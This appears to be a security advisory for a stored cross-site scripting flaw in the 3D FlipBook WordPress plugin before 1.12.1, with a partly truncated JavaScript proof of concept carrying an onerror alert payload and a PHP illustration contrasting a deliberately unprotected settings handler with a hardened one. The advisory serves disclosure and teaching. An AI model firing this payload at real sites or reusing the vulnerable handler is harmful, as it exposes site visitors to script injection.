3D FlipBook < 1.12.1 - Subscriber+ Stored Cross-Site Scripting
The plugin lacks authorisation and CSRF checks when updating its settings and does not sanitise or escape the submitted values, allowing any authenticated user, such as a subscriber, to store Cross-Site Scripting payloads that are rendered on every page containing a 3D flipbook.
Proof of Concept
As a subscriber:
"body": "action=fb3d_receive_book_control_props&props[lightbox][default]=xxx\"><img src onerror=alert(/XSS/)>",
}).then(response => response.text())
.then(data => console.log(data));
The XSS payload is triggered on every page that contains a 3D flipbook.
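The three missing controls named in the advisory (capability check, nonce check, sanitisation/escaping) are what a WordPress admin-ajax settings handler needs; the following is an added illustration, not the plugin's own code or its fix, and the function names, option key and capability used are assumptions. Only the action name comes from the advisory.

```php
<?php
// Added illustration (not the plugin's code): an admin-ajax handler for the
// action named in the advisory, in the unprotected shape it describes and in a
// hardened shape. Function names, option key and capability are assumptions.

// --- Vulnerable shape: no capability check, no nonce, no sanitisation ---
function fb3d_demo_save_props_vulnerable() {
    // Any logged-in user can call this; the raw array (markup included) is
    // stored and later echoed into every page that renders a flipbook.
    update_option( 'fb3d_demo_props', $_POST['props'] );
    wp_die();
}

// --- Hardened shape ---
function fb3d_demo_save_props_secure() {
    // 1. CSRF: the request must carry a nonce issued by the plugin to this user.
    check_ajax_referer( 'fb3d_demo_save_props', 'nonce' );
    // 2. Authorisation: only users allowed to manage options may change settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // 3. Sanitisation: walk the nested props array and keep plain text only.
    $props = isset( $_POST['props'] ) && is_array( $_POST['props'] ) ? wp_unslash( $_POST['props'] ) : array();
    update_option( 'fb3d_demo_props', fb3d_demo_sanitize_recursive( $props ) );
    wp_send_json_success();
}

function fb3d_demo_sanitize_recursive( $value ) {
    if ( is_array( $value ) ) {
        $out = array();
        foreach ( $value as $k => $v ) {
            $out[ sanitize_key( $k ) ] = fb3d_demo_sanitize_recursive( $v );
        }
        return $out;
    }
    return sanitize_text_field( (string) $value );
}

// 4. Escaping at output time, even for stored values, e.g. inside an attribute.
function fb3d_demo_render_lightbox_attr() {
    $props   = get_option( 'fb3d_demo_props', array() );
    $default = isset( $props['lightbox']['default'] ) ? $props['lightbox']['default'] : '';
    return '<div data-lightbox="' . esc_attr( $default ) . '"></div>';
}

// Register only the hardened handler. The 'wp_ajax_' prefix limits the action to
// logged-in users, which is not an authorisation check (a subscriber is logged in).
add_action( 'wp_ajax_fb3d_receive_book_control_props', 'fb3d_demo_save_props_secure' );
```

With the hardened handler, the request shown in the proof of concept fails at the nonce check before any capability or sanitisation logic runs, and a value that did reach storage would still be attribute-escaped when rendered.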